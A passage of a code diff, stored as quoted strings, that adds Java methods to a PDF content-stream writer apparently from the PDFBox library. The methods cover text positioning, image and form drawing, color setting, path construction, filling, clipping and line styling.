+ "+ }", + "+", + "+ COSWriter.writeString(font.encode(text), outputStream);", + "+ }", + "+", + "+ /**", + "+ * Sets the text leading.", + "+ *", + "+ * @param leading The leading in unscaled text units.", + "+ * @throws IOException If there is an error writing to the stream.", + "+ */", + "+ public void setLeading(float leading) throws IOException", + "+ {", + "+ writeOperand(leading);", + "+ writeOperator(\"TL\");", + "+ }", + "+", + "+ /**", + "+ * Move to the start of the next line of text. Requires the leading (see {@link #setLeading})", + "+ * to have been set.", + "+ *", + "+ * @throws IOException If there is an error writing to the stream.", + "+ */", + "+ public void newLine() throws IOException", + "+ {", + "+ if (!inTextMode)", + "+ {", + "+ throw new IllegalStateException(\"Must call beginText() before newLine()\");", + "+ }", + "+ writeOperator(\"T*\");", + "+ }", + "+", + "+ /**", + "+ * The Td operator.", + "+ * Move to the start of the next line, offset from the start of the current line by (tx, ty).", + "+ *", + "+ * @param tx The x translation.", + "+ * @param ty The y translation.", + "+ * @throws IOException If there is an error writing to the stream.", + "+ * @throws IllegalStateException If the method was not allowed to be called at this time.", + "+ */", + "+ public void newLineAtOffset(float tx, float ty) throws IOException", + "+ {", + "+ if (!inTextMode)", + "+ {", + "+ throw new IllegalStateException(\"Error: must call beginText() before newLineAtOffset()\");", + "+ }", + "+ writeOperand(tx);", + "+ writeOperand(ty);", + "+ writeOperator(\"Td\");", + "+ }", + "+", + "+ /**", + "+ * The Tm operator. Sets the text matrix to the given values.", + "+ * A current text matrix will be replaced with the new one.", + "+ *", + "+ * @param matrix the transformation matrix", + "+ * @throws IOException If there is an error writing to the stream.", + "+ * @throws IllegalStateException If the method was not allowed to be called at this time.", + "+ */", + "+ public void setTextMatrix(Matrix matrix) throws IOException", + "+ {", + "+ if (!inTextMode)", + "+ {", + "+ throw new IllegalStateException(\"Error: must call beginText() before setTextMatrix\");", + "+ }", + "+ writeAffineTransform(matrix.createAffineTransform());", + "+ writeOperator(\"Tm\");", + "+ }", + "+", + "+ /**", + "+ * Draw an image at the x,y coordinates, with the default size of the image.", + "+ *", + "+ * @param image The image to draw.", + "+ * @param x The x-coordinate to draw the image.", + "+ * @param y The y-coordinate to draw the image.", + "+ *", + "+ * @throws IOException If there is an error writing to the stream.", + "+ */", + "+ public void drawImage(PDImageXObject image, float x, float y) throws IOException", + "+ {", + "+ drawImage(image, x, y, image.getWidth(), image.getHeight());", + "+ }", + "+", + "+ /**", + "+ * Draw an image at the x,y coordinates, with the given size.", + "+ *", + "+ * @param image The image to draw.", + "+ * @param x The x-coordinate to draw the image.", + "+ * @param y The y-coordinate to draw the image.", + "+ * @param width The width to draw the image.", + "+ * @param height The height to draw the image.", + "+ *", + "+ * @throws IOException If there is an error writing to the stream.", + "+ * @throws IllegalStateException If the method was called within a text block.", + "+ */", + "+ public void drawImage(PDImageXObject image, float x, float y, float width, float height) throws IOException", + "+ {", + "+ if (inTextMode)", + "+ {", + "+ throw new IllegalStateException(\"Error: drawImage is not allowed within a text block.\");", + "+ }", + "+", + "+ saveGraphicsState();", + "+", + "+ AffineTransform transform = new AffineTransform(width, 0, 0, height, x, y);", + "+ transform(new Matrix(transform));", + "+", + "+ writeOperand(resources.add(image));", + "+ writeOperator(\"Do\");", + "+", + "+ restoreGraphicsState();", + "+ }", + "+", + "+ /**", + "+ * Draw an image at the origin with the given transformation matrix.", + "+ *", + "+ * @param image The image to draw.", + "+ * @param matrix The transformation matrix to apply to the image.", + "+ *", + "+ * @throws IOException If there is an error writing to the stream.", + "+ * @throws IllegalStateException If the method was called within a text block.", + "+ */", + "+ public void drawImage(PDImageXObject image, Matrix matrix) throws IOException", + "+ {", + "+ if (inTextMode)", + "+ {", + "+ throw new IllegalStateException(\"Error: drawImage is not allowed within a text block.\");", + "+ }", + "+", + "+ saveGraphicsState();", + "+", + "+ AffineTransform transform = matrix.createAffineTransform();", + "+ transform(new Matrix(transform));", + "+", + "+ writeOperand(resources.add(image));", + "+ writeOperator(\"Do\");", + "+", + "+ restoreGraphicsState();", + "+ }", + "+", + "+ /**", + "+ * Draw an inline image at the x,y coordinates, with the default size of the image.", + "+ *", + "+ * @param inlineImage The inline image to draw.", + "+ * @param x The x-coordinate to draw the inline image.", + "+ * @param y The y-coordinate to draw the inline image.", + "+ *", + "+ * @throws IOException If there is an error writing to the stream.", + "+ */", + "+ public void drawImage(PDInlineImage inlineImage, float x, float y) throws IOException", + "+ {", + "+ drawImage(inlineImage, x, y, inlineImage.getWidth(), inlineImage.getHeight());", + "+ }", + "+", + "+ /**", + "+ * Draw an inline image at the x,y coordinates and a certain width and height.", + "+ *", + "+ * @param inlineImage The inline image to draw.", + "+ * @param x The x-coordinate to draw the inline image.", + "+ * @param y The y-coordinate to draw the inline image.", + "+ * @param width The width of the inline image to draw.", + "+ * @param height The height of the inline image to draw.", + "+ *", + "+ * @throws IOException If there is an error writing to the stream.", + "+ * @throws IllegalStateException If the method was called within a text block.", + "+ */", + "+ public void drawImage(PDInlineImage inlineImage, float x, float y, float width, float height) throws IOException", + "+ {", + "+ if (inTextMode)", + "+ {", + "+ throw new IllegalStateException(\"Error: drawImage is not allowed within a text block.\");", + "+ }", + "+", + "+ saveGraphicsState();", + "+ transform(new Matrix(width, 0, 0, height, x, y));", + "+", + "+ // create the image dictionary", + "+ StringBuilder sb = new StringBuilder();", + "+ sb.append(\"BI\");", + "+", + "+ sb.append(\"\\n /W \");", + "+ sb.append(inlineImage.getWidth());", + "+", + "+ sb.append(\"\\n /H \");", + "+ sb.append(inlineImage.getHeight());", + "+", + "+ sb.append(\"\\n /CS \");", + "+ sb.append(\"/\");", + "+ sb.append(inlineImage.getColorSpace().getName());", + "+", + "+ if (inlineImage.getDecode() != null && inlineImage.getDecode().size() > 0)", + "+ {", + "+ sb.append(\"\\n /D \");", + "+ sb.append(\"[\");", + "+ for (COSBase base : inlineImage.getDecode())", + "+ {", + "+ sb.append(((COSNumber) base).intValue());", + "+ sb.append(\" \");", + "+ }", + "+ sb.append(\"]\");", + "+ }", + "+", + "+ if (inlineImage.isStencil())", + "+ {", + "+ sb.append(\"\\n /IM true\");", + "+ }", + "+", + "+ sb.append(\"\\n /BPC \");", + "+ sb.append(inlineImage.getBitsPerComponent());", + "+", + "+ // image dictionary", + "+ write(sb.toString());", + "+ writeLine();", + "+", + "+ // binary data", + "+ writeOperator(\"ID\");", + "+ writeBytes(inlineImage.getData());", + "+ writeLine();", + "+ writeOperator(\"EI\");", + "+", + "+ restoreGraphicsState();", + "+ }", + "+", + "+ /**", + "+ * Draws the given Form XObject at the current location.", + "+ *", + "+ * @param form Form XObject", + "+ * @throws IOException if the content stream could not be written", + "+ * @throws IllegalStateException If the method was called within a text block.", + "+ */", + "+ public void drawForm(PDFormXObject form) throws IOException", + "+ {", + "+ if (inTextMode)", + "+ {", + "+ throw new IllegalStateException(\"Error: drawForm is not allowed within a text block.\");", + "+ }", + "+", + "+ writeOperand(resources.add(form));", + "+ writeOperator(\"Do\");", + "+ }", + "+", + "+ /**", + "+ * The cm operator. Concatenates the given matrix with the CTM.", + "+ *", + "+ * @param matrix the transformation matrix", + "+ * @throws IOException If there is an error writing to the stream.", + "+ */", + "+ public void transform(Matrix matrix) throws IOException", + "+ {", + "+ if (inTextMode)", + "+ {", + "+ throw new IllegalStateException(\"Error: Modifying the current transformation matrix is not allowed within text objects.\");", + "+ }", + "+", + "+ writeAffineTransform(matrix.createAffineTransform());", + "+ writeOperator(\"cm\");", + "+ }", + "+", + "+ /**", + "+ * q operator. Saves the current graphics state.", + "+ * @throws IOException If an error occurs while writing to the stream.", + "+ */", + "+ public void saveGraphicsState() throws IOException", + "+ {", + "+ if (inTextMode)", + "+ {", + "+ throw new IllegalStateException(\"Error: Saving the graphics state is not allowed within text objects.\");", + "+ }", + "+", + "+ if (!fontStack.isEmpty())", + "+ {", + "+ fontStack.push(fontStack.peek());", + "+ }", + "+ if (!strokingColorSpaceStack.isEmpty())", + "+ {", + "+ strokingColorSpaceStack.push(strokingColorSpaceStack.peek());", + "+ }", + "+ if (!nonStrokingColorSpaceStack.isEmpty())", + "+ {", + "+ nonStrokingColorSpaceStack.push(nonStrokingColorSpaceStack.peek());", + "+ }", + "+ writeOperator(\"q\");", + "+ }", + "+", + "+ /**", + "+ * Q operator. Restores the current graphics state.", + "+ * @throws IOException If an error occurs while writing to the stream.", + "+ */", + "+ public void restoreGraphicsState() throws IOException", + "+ {", + "+ if (inTextMode)", + "+ {", + "+ throw new IllegalStateException(\"Error: Restoring the graphics state is not allowed within text objects.\");", + "+ }", + "+", + "+ if (!fontStack.isEmpty())", + "+ {", + "+ fontStack.pop();", + "+ }", + "+ if (!strokingColorSpaceStack.isEmpty())", + "+ {", + "+ strokingColorSpaceStack.pop();", + "+ }", + "+ if (!nonStrokingColorSpaceStack.isEmpty())", + "+ {", + "+ nonStrokingColorSpaceStack.pop();", + "+ }", + "+ writeOperator(\"Q\");", + "+ }", + "+", + "+ protected COSName getName(PDColorSpace colorSpace)", + "+ {", + "+ if (colorSpace instanceof PDDeviceGray ||", + "+ colorSpace instanceof PDDeviceRGB ||", + "+ colorSpace instanceof PDDeviceCMYK)", + "+ {", + "+ return COSName.getPDFName(colorSpace.getName());", + "+ }", + "+ else", + "+ {", + "+ return resources.add(colorSpace);", + "+ }", + "+ }", + "+", + "+ /**", + "+ * Sets the stroking color and, if necessary, the stroking color space.", + "+ *", + "+ * @param color Color in a specific color space.", + "+ * @throws IOException If an IO error occurs while writing to the stream.", + "+ */", + "+ public void setStrokingColor(PDColor color) throws IOException", + "+ {", + "+ if (strokingColorSpaceStack.isEmpty() ||", + "+ strokingColorSpaceStack.peek() != color.getColorSpace())", + "+ {", + "+ writeOperand(getName(color.getColorSpace()));", + "+ writeOperator(\"CS\");", + "+ setStrokingColorSpaceStack(color.getColorSpace());", + "+ }", + "+", + "+ for (float value : color.getComponents())", + "+ {", + "+ writeOperand(value);", + "+ }", + "+", + "+ if (color.getColorSpace() instanceof PDPattern)", + "+ {", + "+ writeOperand(color.getPatternName());", + "+ }", + "+", + "+ if (color.getColorSpace() instanceof PDPattern ||", + "+ color.getColorSpace() instanceof PDSeparation ||", + "+ color.getColorSpace() instanceof PDDeviceN ||", + "+ color.getColorSpace() instanceof PDICCBased)", + "+ {", + "+ writeOperator(\"SCN\");", + "+ }", + "+ else", + "+ {", + "+ writeOperator(\"SC\");", + "+ }", + "+ }", + "+", + "+ /**", + "+ * Set the stroking color using an AWT color. Conversion uses the default sRGB color space.", + "+ *", + "+ * @param color The color to set.", + "+ * @throws IOException If an IO error occurs while writing to the stream.", + "+ */", + "+ public void setStrokingColor(Color color) throws IOException", + "+ {", + "+ float[] components = new float[] {", + "+ color.getRed() / 255f, color.getGreen() / 255f, color.getBlue() / 255f };", + "+ PDColor pdColor = new PDColor(components, PDDeviceRGB.INSTANCE);", + "+ setStrokingColor(pdColor);", + "+ }", + "+", + "+ /**", + "+ * Set the stroking color in the DeviceRGB color space. Range is 0..255.", + "+ *", + "+ * @param r The red value", + "+ * @param g The green value.", + "+ * @param b The blue value.", + "+ * @throws IOException If an IO error occurs while writing to the stream.", + "+ * @throws IllegalArgumentException If the parameters are invalid.", + "+ */", + "+ public void setStrokingColor(int r, int g, int b) throws IOException", + "+ {", + "+ if (isOutside255Interval(r) || isOutside255Interval(g) || isOutside255Interval(b))", + "+ {", + "+ throw new IllegalArgumentException(\"Parameters must be within 0..255, but are \"", + "+ + String.format(\"(%d,%d,%d)\", r, g, b));", + "+ }", + "+ writeOperand(r / 255f);", + "+ writeOperand(g / 255f);", + "+ writeOperand(b / 255f);", + "+ writeOperator(\"RG\");", + "+ setStrokingColorSpaceStack(PDDeviceRGB.INSTANCE);", + "+ }", + "+", + "+ /**", + "+ * Set the stroking color in the DeviceCMYK color space. Range is 0..1", + "+ *", + "+ * @param c The cyan value.", + "+ * @param m The magenta value.", + "+ * @param y The yellow value.", + "+ * @param k The black value.", + "+ * @throws IOException If an IO error occurs while writing to the stream.", + "+ * @throws IllegalArgumentException If the parameters are invalid.", + "+ */", + "+ public void setStrokingColor(float c, float m, float y, float k) throws IOException", + "+ {", + "+ if (isOutsideOneInterval(c) || isOutsideOneInterval(m) || isOutsideOneInterval(y) || isOutsideOneInterval(k))", + "+ {", + "+ throw new IllegalArgumentException(\"Parameters must be within 0..1, but are \"", + "+ + String.format(\"(%.2f,%.2f,%.2f,%.2f)\", c, m, y, k));", + "+ }", + "+ writeOperand(c);", + "+ writeOperand(m);", + "+ writeOperand(y);", + "+ writeOperand(k);", + "+ writeOperator(\"K\");", + "+ setStrokingColorSpaceStack(PDDeviceCMYK.INSTANCE);", + "+ }", + "+", + "+ /**", + "+ * Set the stroking color in the DeviceGray color space. Range is 0..1.", + "+ *", + "+ * @param g The gray value.", + "+ * @throws IOException If an IO error occurs while writing to the stream.", + "+ * @throws IllegalArgumentException If the parameter is invalid.", + "+ */", + "+ public void setStrokingColor(float g) throws IOException", + "+ {", + "+ if (isOutsideOneInterval(g))", + "+ {", + "+ throw new IllegalArgumentException(\"Parameter must be within 0..1, but is \" + g);", + "+ }", + "+ writeOperand(g);", + "+ writeOperator(\"G\");", + "+ setStrokingColorSpaceStack(PDDeviceGray.INSTANCE);", + "+ }", + "+", + "+ /**", + "+ * Sets the non-stroking color and, if necessary, the non-stroking color space.", + "+ *", + "+ * @param color Color in a specific color space.", + "+ * @throws IOException If an IO error occurs while writing to the stream.", + "+ */", + "+ public void setNonStrokingColor(PDColor color) throws IOException", + "+ {", + "+ if (nonStrokingColorSpaceStack.isEmpty() ||", + "+ nonStrokingColorSpaceStack.peek() != color.getColorSpace())", + "+ {", + "+ writeOperand(getName(color.getColorSpace()));", + "+ writeOperator(\"cs\");", + "+ setNonStrokingColorSpaceStack(color.getColorSpace());", + "+ }", + "+", + "+ for (float value : color.getComponents())", + "+ {", + "+ writeOperand(value);", + "+ }", + "+", + "+ if (color.getColorSpace() instanceof PDPattern)", + "+ {", + "+ writeOperand(color.getPatternName());", + "+ }", + "+", + "+ if (color.getColorSpace() instanceof PDPattern ||", + "+ color.getColorSpace() instanceof PDSeparation ||", + "+ color.getColorSpace() instanceof PDDeviceN ||", + "+ color.getColorSpace() instanceof PDICCBased)", + "+ {", + "+ writeOperator(\"scn\");", + "+ }", + "+ else", + "+ {", + "+ writeOperator(\"sc\");", + "+ }", + "+ }", + "+", + "+ /**", + "+ * Set the non-stroking color using an AWT color. Conversion uses the default sRGB color space.", + "+ *", + "+ * @param color The color to set.", + "+ * @throws IOException If an IO error occurs while writing to the stream.", + "+ */", + "+ public void setNonStrokingColor(Color color) throws IOException", + "+ {", + "+ float[] components = new float[] {", + "+ color.getRed() / 255f, color.getGreen() / 255f, color.getBlue() / 255f };", + "+ PDColor pdColor = new PDColor(components, PDDeviceRGB.INSTANCE);", + "+ setNonStrokingColor(pdColor);", + "+ }", + "+", + "+ /**", + "+ * Set the non-stroking color in the DeviceRGB color space. Range is 0..255.", + "+ *", + "+ * @param r The red value.", + "+ * @param g The green value.", + "+ * @param b The blue value.", + "+ * @throws IOException If an IO error occurs while writing to the stream.", + "+ * @throws IllegalArgumentException If the parameters are invalid.", + "+ */", + "+ public void setNonStrokingColor(int r, int g, int b) throws IOException", + "+ {", + "+ if (isOutside255Interval(r) || isOutside255Interval(g) || isOutside255Interval(b))", + "+ {", + "+ throw new IllegalArgumentException(\"Parameters must be within 0..255, but are \"", + "+ + String.format(\"(%d,%d,%d)\", r, g, b));", + "+ }", + "+ writeOperand(r / 255f);", + "+ writeOperand(g / 255f);", + "+ writeOperand(b / 255f);", + "+ writeOperator(\"rg\");", + "+ setNonStrokingColorSpaceStack(PDDeviceRGB.INSTANCE);", + "+ }", + "+", + "+ /**", + "+ * Set the non-stroking color in the DeviceCMYK color space. Range is 0..255.", + "+ *", + "+ * @param c The cyan value.", + "+ * @param m The magenta value.", + "+ * @param y The yellow value.", + "+ * @param k The black value.", + "+ * @throws IOException If an IO error occurs while writing to the stream.", + "+ * @throws IllegalArgumentException If the parameters are invalid.", + "+ */", + "+ public void setNonStrokingColor(int c, int m, int y, int k) throws IOException", + "+ {", + "+ if (isOutside255Interval(c) || isOutside255Interval(m) || isOutside255Interval(y) || isOutside255Interval(k))", + "+ {", + "+ throw new IllegalArgumentException(\"Parameters must be within 0..255, but are \"", + "+ + String.format(\"(%d,%d,%d,%d)\", c, m, y, k));", + "+ }", + "+ setNonStrokingColor(c / 255f, m / 255f, y / 255f, k / 255f);", + "+ }", + "+", + "+ /**", + "+ * Set the non-stroking color in the DeviceCMYK color space. Range is 0..1.", + "+ *", + "+ * @param c The cyan value.", + "+ * @param m The magenta value.", + "+ * @param y The yellow value.", + "+ * @param k The black value.", + "+ * @throws IOException If an IO error occurs while writing to the stream.", + "+ */", + "+ public void setNonStrokingColor(float c, float m, float y, float k) throws IOException", + "+ {", + "+ if (isOutsideOneInterval(c) || isOutsideOneInterval(m) || isOutsideOneInterval(y) || isOutsideOneInterval(k))", + "+ {", + "+ throw new IllegalArgumentException(\"Parameters must be within 0..1, but are \"", + "+ + String.format(\"(%.2f,%.2f,%.2f,%.2f)\", c, m, y, k));", + "+ }", + "+ writeOperand(c);", + "+ writeOperand(m);", + "+ writeOperand(y);", + "+ writeOperand(k);", + "+ writeOperator(\"k\");", + "+ setNonStrokingColorSpaceStack(PDDeviceCMYK.INSTANCE);", + "+ }", + "+", + "+ /**", + "+ * Set the non-stroking color in the DeviceGray color space. Range is 0..255.", + "+ *", + "+ * @param g The gray value.", + "+ * @throws IOException If an IO error occurs while writing to the stream.", + "+ * @throws IllegalArgumentException If the parameter is invalid.", + "+ */", + "+ public void setNonStrokingColor(int g) throws IOException", + "+ {", + "+ if (isOutside255Interval(g))", + "+ {", + "+ throw new IllegalArgumentException(\"Parameter must be within 0..255, but is \" + g);", + "+ }", + "+ setNonStrokingColor(g / 255f);", + "+ }", + "+", + "+ /**", + "+ * Set the non-stroking color in the DeviceGray color space. Range is 0..1.", + "+ *", + "+ * @param g The gray value.", + "+ * @throws IOException If an IO error occurs while writing to the stream.", + "+ * @throws IllegalArgumentException If the parameter is invalid.", + "+ */", + "+ public void setNonStrokingColor(float g) throws IOException", + "+ {", + "+ if (isOutsideOneInterval(g))", + "+ {", + "+ throw new IllegalArgumentException(\"Parameter must be within 0..1, but is \" + g);", + "+ }", + "+ writeOperand(g);", + "+ writeOperator(\"g\");", + "+ setNonStrokingColorSpaceStack(PDDeviceGray.INSTANCE);", + "+ }", + "+", + "+ /**", + "+ * Add a rectangle to the current path.", + "+ *", + "+ * @param x The lower left x coordinate.", + "+ * @param y The lower left y coordinate.", + "+ * @param width The width of the rectangle.", + "+ * @param height The height of the rectangle.", + "+ * @throws IOException If the content stream could not be written.", + "+ * @throws IllegalStateException If the method was called within a text block.", + "+ */", + "+ public void addRect(float x, float y, float width, float height) throws IOException", + "+ {", + "+ if (inTextMode)", + "+ {", + "+ throw new IllegalStateException(\"Error: addRect is not allowed within a text block.\");", + "+ }", + "+ writeOperand(x);", + "+ writeOperand(y);", + "+ writeOperand(width);", + "+ writeOperand(height);", + "+ writeOperator(\"re\");", + "+ }", + "+", + "+ /**", + "+ * Append a cubic B\u00c3\u00a9zier curve to the current path. The curve extends from the current point to", + "+ * the point (x3, y3), using (x1, y1) and (x2, y2) as the B\u00c3\u00a9zier control points.", + "+ *", + "+ * @param x1 x coordinate of the point 1", + "+ * @param y1 y coordinate of the point 1", + "+ * @param x2 x coordinate of the point 2", + "+ * @param y2 y coordinate of the point 2", + "+ * @param x3 x coordinate of the point 3", + "+ * @param y3 y coordinate of the point 3", + "+ * @throws IOException If the content stream could not be written.", + "+ * @throws IllegalStateException If the method was called within a text block.", + "+ */", + "+ public void curveTo(float x1, float y1, float x2, float y2, float x3, float y3) throws IOException", + "+ {", + "+ if (inTextMode)", + "+ {", + "+ throw new IllegalStateException(\"Error: curveTo is not allowed within a text block.\");", + "+ }", + "+ writeOperand(x1);", + "+ writeOperand(y1);", + "+ writeOperand(x2);", + "+ writeOperand(y2);", + "+ writeOperand(x3);", + "+ writeOperand(y3);", + "+ writeOperator(\"c\");", + "+ }", + "+", + "+ /**", + "+ * Append a cubic B\u00c3\u00a9zier curve to the current path. The curve extends from the current point to", + "+ * the point (x3, y3), using the current point and (x2, y2) as the B\u00c3\u00a9zier control points.", + "+ *", + "+ * @param x2 x coordinate of the point 2", + "+ * @param y2 y coordinate of the point 2", + "+ * @param x3 x coordinate of the point 3", + "+ * @param y3 y coordinate of the point 3", + "+ * @throws IllegalStateException If the method was called within a text block.", + "+ * @throws IOException If the content stream could not be written.", + "+ */", + "+ public void curveTo2(float x2, float y2, float x3, float y3) throws IOException", + "+ {", + "+ if (inTextMode)", + "+ {", + "+ throw new IllegalStateException(\"Error: curveTo2 is not allowed within a text block.\");", + "+ }", + "+ writeOperand(x2);", + "+ writeOperand(y2);", + "+ writeOperand(x3);", + "+ writeOperand(y3);", + "+ writeOperator(\"v\");", + "+ }", + "+", + "+ /**", + "+ * Append a cubic B\u00c3\u00a9zier curve to the current path. The curve extends from the current point to", + "+ * the point (x3, y3), using (x1, y1) and (x3, y3) as the B\u00c3\u00a9zier control points.", + "+ *", + "+ * @param x1 x coordinate of the point 1", + "+ * @param y1 y coordinate of the point 1", + "+ * @param x3 x coordinate of the point 3", + "+ * @param y3 y coordinate of the point 3", + "+ * @throws IOException If the content stream could not be written.", + "+ * @throws IllegalStateException If the method was called within a text block.", + "+ */", + "+ public void curveTo1(float x1, float y1, float x3, float y3) throws IOException", + "+ {", + "+ if (inTextMode)", + "+ {", + "+ throw new IllegalStateException(\"Error: curveTo1 is not allowed within a text block.\");", + "+ }", + "+ writeOperand(x1);", + "+ writeOperand(y1);", + "+ writeOperand(x3);", + "+ writeOperand(y3);", + "+ writeOperator(\"y\");", + "+ }", + "+", + "+ /**", + "+ * Move the current position to the given coordinates.", + "+ *", + "+ * @param x The x coordinate.", + "+ * @param y The y coordinate.", + "+ * @throws IOException If the content stream could not be written.", + "+ * @throws IllegalStateException If the method was called within a text block.", + "+ */", + "+ public void moveTo(float x, float y) throws IOException", + "+ {", + "+ if (inTextMode)", + "+ {", + "+ throw new IllegalStateException(\"Error: moveTo is not allowed within a text block.\");", + "+ }", + "+ writeOperand(x);", + "+ writeOperand(y);", + "+ writeOperator(\"m\");", + "+ }", + "+", + "+ /**", + "+ * Draw a line from the current position to the given coordinates.", + "+ *", + "+ * @param x The x coordinate.", + "+ * @param y The y coordinate.", + "+ * @throws IOException If the content stream could not be written.", + "+ * @throws IllegalStateException If the method was called within a text block.", + "+ */", + "+ public void lineTo(float x, float y) throws IOException", + "+ {", + "+ if (inTextMode)", + "+ {", + "+ throw new IllegalStateException(\"Error: lineTo is not allowed within a text block.\");", + "+ }", + "+ writeOperand(x);", + "+ writeOperand(y);", + "+ writeOperator(\"l\");", + "+ }", + "+", + "+ /**", + "+ * Stroke the path.", + "+ * ", + "+ * @throws IOException If the content stream could not be written", + "+ * @throws IllegalStateException If the method was called within a text block.", + "+ */", + "+ public void stroke() throws IOException", + "+ {", + "+ if (inTextMode)", + "+ {", + "+ throw new IllegalStateException(\"Error: stroke is not allowed within a text block.\");", + "+ }", + "+ writeOperator(\"S\");", + "+ }", + "+", + "+ /**", + "+ * Close and stroke the path.", + "+ * ", + "+ * @throws IOException If the content stream could not be written", + "+ * @throws IllegalStateException If the method was called within a text block.", + "+ */", + "+ public void closeAndStroke() throws IOException", + "+ {", + "+ if (inTextMode)", + "+ {", + "+ throw new IllegalStateException(\"Error: closeAndStroke is not allowed within a text block.\");", + "+ }", + "+ writeOperator(\"s\");", + "+ }", + "+", + "+ /**", + "+ * Fills the path using the nonzero winding number rule.", + "+ *", + "+ * @throws IOException If the content stream could not be written", + "+ * @throws IllegalStateException If the method was called within a text block.", + "+ */", + "+ public void fill() throws IOException", + "+ {", + "+ if (inTextMode)", + "+ {", + "+ throw new IllegalStateException(\"Error: fill is not allowed within a text block.\");", + "+ }", + "+ writeOperator(\"f\");", + "+ }", + "+", + "+ /**", + "+ * Fills the path using the even-odd winding rule.", + "+ *", + "+ * @throws IOException If the content stream could not be written", + "+ * @throws IllegalStateException If the method was called within a text block.", + "+ */", + "+ public void fillEvenOdd() throws IOException", + "+ {", + "+ if (inTextMode)", + "+ {", + "+ throw new IllegalStateException(\"Error: fillEvenOdd is not allowed within a text block.\");", + "+ }", + "+ writeOperator(\"f*\");", + "+ }", + "+", + "+ /**", + "+ * Fill and then stroke the path, using the nonzero winding number rule to determine the region", + "+ * to fill. This shall produce the same result as constructing two identical path objects,", + "+ * painting the first with {@link #fill() } and the second with {@link #stroke() }.", + "+ *", + "+ * @throws IOException If the content stream could not be written", + "+ * @throws IllegalStateException If the method was called within a text block.", + "+ */", + "+ public void fillAndStroke() throws IOException", + "+ {", + "+ if (inTextMode)", + "+ {", + "+ throw new IllegalStateException(\"Error: fillAndStroke is not allowed within a text block.\");", + "+ }", + "+ writeOperator(\"B\");", + "+ }", + "+", + "+ /**", + "+ * Fill and then stroke the path, using the even-odd rule to determine the region to", + "+ * fill. This shall produce the same result as constructing two identical path objects, painting", + "+ * the first with {@link #fillEvenOdd() } and the second with {@link #stroke() }.", + "+ *", + "+ * @throws IOException If the content stream could not be written", + "+ * @throws IllegalStateException If the method was called within a text block.", + "+ */", + "+ public void fillAndStrokeEvenOdd() throws IOException", + "+ {", + "+ if (inTextMode)", + "+ {", + "+ throw new IllegalStateException(\"Error: fillAndStrokeEvenOdd is not allowed within a text block.\");", + "+ }", + "+ writeOperator(\"B*\");", + "+ }", + "+", + "+ /**", + "+ * Close, fill, and then stroke the path, using the nonzero winding number rule to determine the", + "+ * region to fill. This shall have the same effect as the sequence {@link #closePath() }", + "+ * and then {@link #fillAndStroke() }.", + "+ *", + "+ * @throws IOException If the content stream could not be written", + "+ * @throws IllegalStateException If the method was called within a text block.", + "+ */", + "+ public void closeAndFillAndStroke() throws IOException", + "+ {", + "+ if (inTextMode)", + "+ {", + "+ throw new IllegalStateException(\"Error: closeAndFillAndStroke is not allowed within a text block.\");", + "+ }", + "+ writeOperator(\"b\");", + "+ }", + "+", + "+ /**", + "+ * Close, fill, and then stroke the path, using the even-odd rule to determine the region to", + "+ * fill. This shall have the same effect as the sequence {@link #closePath() }", + "+ * and then {@link #fillAndStrokeEvenOdd() }.", + "+ *", + "+ * @throws IOException If the content stream could not be written", + "+ * @throws IllegalStateException If the method was called within a text block.", + "+ */", + "+ public void closeAndFillAndStrokeEvenOdd() throws IOException", + "+ {", + "+ if (inTextMode)", + "+ {", + "+ throw new IllegalStateException(\"Error: closeAndFillAndStrokeEvenOdd is not allowed within a text block.\");", + "+ }", + "+ writeOperator(\"b*\");", + "+ }", + "+", + "+ /**", + "+ * Fills the clipping area with the given shading.", + "+ *", + "+ * @param shading Shading resource", + "+ * @throws IOException If the content stream could not be written", + "+ * @throws IllegalStateException If the method was called within a text block.", + "+ */", + "+ public void shadingFill(PDShading shading) throws IOException", + "+ {", + "+ if (inTextMode)", + "+ {", + "+ throw new IllegalStateException(\"Error: shadingFill is not allowed within a text block.\");", + "+ }", + "+", + "+ writeOperand(resources.add(shading));", + "+ writeOperator(\"sh\");", + "+ }", + "+", + "+ /**", + "+ * Closes the current subpath.", + "+ *", + "+ * @throws IOException If the content stream could not be written", + "+ * @throws IllegalStateException If the method was called within a text block.", + "+ */", + "+ public void closePath() throws IOException", + "+ {", + "+ if (inTextMode)", + "+ {", + "+ throw new IllegalStateException(\"Error: closePath is not allowed within a text block.\");", + "+ }", + "+ writeOperator(\"h\");", + "+ }", + "+", + "+ /**", + "+ * Intersects the current clipping path with the current path, using the nonzero rule.", + "+ *", + "+ * @throws IOException If the content stream could not be written", + "+ * @throws IllegalStateException If the method was called within a text block.", + "+ */", + "+ public void clip() throws IOException", + "+ {", + "+ if (inTextMode)", + "+ {", + "+ throw new IllegalStateException(\"Error: clip is not allowed within a text block.\");", + "+ }", + "+ writeOperator(\"W\");", + "+ ", + "+ // end path without filling or stroking", + "+ writeOperator(\"n\");", + "+ }", + "+", + "+ /**", + "+ * Intersects the current clipping path with the current path, using the even-odd rule.", + "+ *", + "+ * @throws IOException If the content stream could not be written", + "+ * @throws IllegalStateException If the method was called within a text block.", + "+ */", + "+ public void clipEvenOdd() throws IOException", + "+ {", + "+ if (inTextMode)", + "+ {", + "+ throw new IllegalStateException(\"Error: clipEvenOdd is not allowed within a text block.\");", + "+ }", + "+ writeOperator(\"W*\");", + "+ ", + "+ // end path without filling or stroking", + "+ writeOperator(\"n\");", + "+ }", + "+", + "+ /**", + "+ * Set line width to the given value.", + "+ *", + "+ * @param lineWidth The width which is used for drawing.", + "+ * @throws IOException If the content stream could not be written", + "+ * @throws IllegalStateException If the method was called within a text block.", + "+ */", + "+ public void setLineWidth(float lineWidth) throws IOException", + "+ {", + "+ if (inTextMode)", + "+ {", + "+ throw new IllegalStateException(\"Error: setLineWidth is not allowed within a text block.\");", + "+ }", + "+ writeOperand(lineWidth);", + "+ writeOperator(\"w\");", + "+ }", + "+", + "+ /**", + "+ * Set the line join style.", + "+ *", + "+ * @param lineJoinStyle 0 for miter join, 1 for round join, and 2 for bevel join.", + "+ * @throws IOException If the content stream could not be written.", + "+ * @throws IllegalStateException If the method was called within a text block.", + "+ * @throws IllegalArgumentException If the parameter is not a valid line join style.", + "+ */", + "+ public void setLineJoinStyle(int lineJoinStyle) throws IOException", + "+ {", + "+ if (inTextMode)", + "+ {", + "+ throw new IllegalStateException(\"Error: setLineJoinStyle is not allowed within a text block.\");", + "+ }", + "+ if (lineJoinStyle >= 0 && lineJoinStyle <= 2)", + "+ {", + "+ writeOperand(lineJoinStyle);", + "+ writeOperator(\"j\");", + "+ }", + "+ else", + "+ {", + 